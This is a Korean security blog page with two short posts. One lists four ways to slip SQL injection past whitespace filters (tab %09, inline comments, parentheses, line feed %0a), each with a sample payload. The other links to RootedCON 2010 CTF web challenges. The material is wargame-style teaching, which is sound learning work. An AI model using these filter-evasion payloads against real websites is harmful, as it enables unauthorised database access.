getogrand's blog
게토클로버
getogrand's blog
 
전체
English
Hacking
Programming
Database
Hardware
OS
Others
Network
Mobile
My Life
     
«   2012/05   »
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    
 
     
2012/03 - 1
2012/02 - 1
2012/01 - 1
2011/11 - 1
2011/10 - 1
  

Total 297650, yesterday 21, today 12
powered by Tatter tools, designed by kokoro studio.
  1. 2011/06/27 SQL Injection 공백 우회 방법 by oldzombie
  2. 2011/04/09 Web challenges from RootedCON'2010 CTF

SQL Injection을 할 때 공백을 trim()함수등을 이용하여 필터링하는 경우가 있는데,
몇 가지 방법을 통해 우회가 가능합니다.

1. 탭
  탭을 url에 쓸 때에는 %09로 인코딩해서 씁니다
ex) no=1%09and%091=1


2. 주석
ex) no=1/**/and/**/1=1


3. 괄호
ex) no=(1)or(1=1)


from webhacking.kr  blog

4. 개행(라인피드)
ex) no1%0aand1=1
크리에이티브 커먼즈 라이센스
Creative Commons License
2011/06/27 12:02 2011/06/27 12:02
   이 글에는 트랙백을 보낼 수 없습니다
오늘 돌아다니다가 워게임 사이트 하나 찾아서 링크 올립니다.

http://www.rs-labs.com/rooted2010-ctf/


웹해킹 문제 7개 있네요.
크리에이티브 커먼즈 라이센스
Creative Commons License
2011/04/09 16:33 2011/04/09 16:33
   이 글에는 트랙백을 보낼 수 없습니다
*1